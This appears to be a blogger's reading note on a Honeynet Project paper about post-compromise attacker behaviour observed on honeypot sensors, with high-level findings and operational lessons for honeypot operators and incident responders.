The Honeynet Project has published a substantial new instalment in their Know Your Enemy paper series. The focus this time is post-compromise attacker behaviour observed across the project's distributed sensor network. A reading note.
This is a longer post because the paper is substantive and the operational lessons are worth treating carefully.
What the paper covers
The paper draws on data from the Honeynet Project's distributed sensors over the past 18 months. The focus is what attackers do after they have compromised a host — the often-undocumented operational period between initial exploitation and either persistence-and-leave or active use.
Specific topics covered:
Tool-chain deployment patterns. What tools attackers download, how they download them, where they store them. The patterns are surprisingly consistent across compromise events; specific toolchains recur.
Persistence techniques. How attackers ensure they retain access. Specific patterns: replacing system binaries, modifying init scripts, deploying scheduled tasks, hiding files in unusual paths.
Post-compromise reconnaissance. What attackers look at before doing further work. Specific patterns: enumerating users, examining mail spools, listing recent file activity, examining network configuration.
Data exfiltration patterns. How attackers extract data. Specific patterns: tar archives uploaded to specific FTP servers, encrypted archives, occasionally email-based exfiltration through compromised accounts.
Lateral movement. How compromised hosts are used to compromise other hosts. Specific patterns: scanning the local network, attempting credential reuse, exploiting trust relationships.
The cumulative picture is detailed. The post-compromise period is shown to have specific structure that is observable through proper instrumentation.
What is structurally novel
Three findings I had not seen documented at this depth.
Skilled human attackers spend most of their time on reconnaissance. The actual exploitation is brief; the actual persistence deployment is brief; the time spent looking at the compromised host's contents and connections is substantial. The behavioural pattern matches what intelligence-gathering rather than damage-causing intent would predict.
Specific tool-chains are reused across many compromises. The same patterns of tool deployment recur. This is informative about the threat-actor population: specific toolchains are shared among specific operator groups; the toolchains themselves are evidence of group identity even when other identifying features are obscured.
Cleanup behaviour is surprisingly thorough among skilled attackers. Logs are tampered with; specific traces are removed; the host is sometimes left in better condition (from the attacker's perspective) than when it was compromised. The cleanup discipline is consistent with intelligence-collection rather than vandalism.
The trajectory of finding suggests the threat-actor population includes a meaningful fraction of skilled, deliberate, careful actors. The mass-of-amateurs framing that dominated earlier security writing does not match the current data.
What this teaches operationally
Four operational lessons from the paper.
Off-host instrumentation is essential for capturing post-compromise behaviour. Skilled attackers tamper with on-host logs; they do not tamper with logs they cannot see. The Sebek-class instrumentation that captures keystrokes and command activity from outside the host is what produces the data the paper draws on.
Long observation windows produce qualitatively different findings. Snapshot data shows what attackers do at the moment of capture; sustained observation reveals what they do across time. Specific patterns visible only across sustained observation include the careful-cleanup discipline and the targeted-reconnaissance pattern.
The threat-actor population is structured. Specific toolchains, specific operational patterns, specific cleanup disciplines suggest specific groups with specific procedures. The structured population is a more useful threat model than the mass-of-amateurs framing.
Cross-operator data is more valuable than single-operator data. The Honeynet Project's distributed sensor network produces patterns that no single operator's data could produce. The cumulative cross-operator analysis is what makes the paper substantive.
What this means for my own honeypot
Two specific changes I am thinking about.
Improved off-host instrumentation. My current Sebek deployment is workable but bounded. Specific improvements (better filtering, more efficient log forwarding, capture of more activity types) would produce more comprehensive data. The investment is bounded.
More structured contribution to the broader project. I have been corresponding with several Honeynet Project researchers; my own captures could feed into the cumulative cross-operator analysis. The discipline of structured contribution requires more rigorous metadata than I currently maintain; the investment is worth considering.
For my own infrastructure: the operational discipline continues. Specific improvements will be incremental.
What this paper does not address
A few areas I would have liked to see treated:
Mobile or embedded-device compromise. The paper focuses on server-class hosts. The mobile and embedded categories are emerging; comparable structural analysis would be useful.
Long-term persistence (months or years). The paper's observation windows are weeks to months; longer observation would inform the structural understanding of intelligence-collection campaigns.
Specific commercial-cybercrime patterns. The paper covers the technical patterns; the commercial-economic patterns are mentioned but not treated in depth. The two are connected; further work would benefit from integrated treatment.
These are areas where future work could build on the current paper.
Reading recommendation
For anyone running honeypot infrastructure: read the paper carefully. The operational lessons are directly applicable.
For anyone responsible for incident response in production environments: read the paper carefully. The post-compromise behaviour described is what you will be investigating during real incidents; the patterns inform the investigation.
For anyone curious about the structural shape of the threat-actor population: read the paper carefully. The careful-attacker pattern documented is the operationally significant population.
The paper is, on balance, the most substantial piece of public security research I have read this year. The investment of reading time is bounded; the cumulative knowledge is meaningful.
A specific note on the project
The Honeynet Project is a volunteer effort that has produced consistent quality across multiple papers over multiple years. The cumulative output is substantial; the contribution to the field is real.
For anyone in a position to contribute (financially, with sensor data, with research time): the project benefits. For anyone consuming the output: the work depends on the volunteer effort behind it.
More in time.